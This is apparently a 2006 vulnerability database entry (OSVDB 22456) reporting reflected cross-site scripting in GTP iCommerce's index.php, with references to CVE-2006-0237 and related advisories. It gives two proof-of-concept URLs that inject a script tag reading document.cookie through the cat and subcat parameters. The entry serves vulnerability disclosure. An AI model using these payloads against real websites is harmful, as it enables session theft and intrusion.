GTP iCommerce index.php Multiple Variable XSS

2006-01-15T09:18:18
ID OSVDB:22456
Type osvdb
Reporter OSVDB
Modified 2006-01-15T09:18:18

Description

Manual Testing Notes

http://[target]/index.php?page=listStory&cat=Programs+and+Services&subcat="><script>alert(document.cookie)</script>

http://[target]/index.php?page=listStory&cat="><script>alert(document.cookie)</script>

References:

Vendor URL: http://www.gtp-icommerce.com/ Secunia Advisory ID:18470 Other Advisory URL: http://osvdb.org/ref/22/22456-icommerce.txt FrSIRT Advisory: ADV-2006-0214 CVE-2006-0237 Bugtraq ID: 16255